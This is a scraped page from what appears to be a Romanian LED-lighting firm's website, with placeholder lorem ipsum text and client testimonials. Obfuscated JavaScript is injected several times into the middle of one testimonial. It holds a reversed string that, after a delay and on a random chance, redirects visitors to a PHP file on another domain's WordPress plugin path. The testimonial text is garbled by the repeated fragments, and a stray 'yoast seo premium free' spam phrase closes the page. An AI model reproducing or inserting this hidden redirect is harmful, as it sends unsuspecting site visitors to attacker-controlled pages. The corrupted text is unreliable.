Lorem ipsum dolor sit amet, consectetuer vitae adipiscing elit. Aenean commodo ligula eget ut, dolor. Aenean massa. Cum sociis pretium qui asem. Nulla consequat massa quis.

Popular Post

Sign up for newsletter
[contact-form-7 id="3" html_class="cf7_custom_style_2"]

TESTIMONIALE

namik-yumruk

NAMIK YUMRUK

Director Achizitii si Administrativ la Kanal D

Pentru o televiziune, sistemele de iluminat sunt ceva special. Noi avansam cele mai noi idei in materie de iluminat decorativ, iar provocarile sunt la cele mai inalte cote.Dar, Showmine are o echipa de profesionisti, iar dupa ce am vazut realizarile lor din alte proiecte am stiut ca ne-ar putea ajuta la realizarea sistemului nostru de iluminat.Platoul de televiziune arata perfect. Nu am putea fi mai fericiti de rezultatele obtinute.

MARIA NEACSU

Conference

Rezultatele au fost extraordinare. Consumul de energie a scazut cu aproximativ 20% comparativ cu anul trecut, iar in ultimele 12 luni nu am avut nevoie de nici o interventie asupra sistemului de iluminat. Toate becurile cu led-uri sunt functionale, iar angajatii nostri sunt multumiti de lumina alba, care creaza un mediu de lucru mult mai placut.
maria-neacsu
silviu-carstea

SILVIU CARSTEA

Director Executiv la RSC

”Ca
) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and vine vorba de tehnologi verzi. Acest lucru se transmite in fiecare aspect al afacerii noastre, iar sistemul de iluminat trebuie sa respecte aceste standom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andarde. Showmine a fost cheia in realizarea unui sistem de iluminat LED pentru spatiul nostru de lucru. Nu doar ce am ales o economie de energie dar si spatiul a capatat un aspect fantastic.”]

yoast seo premium free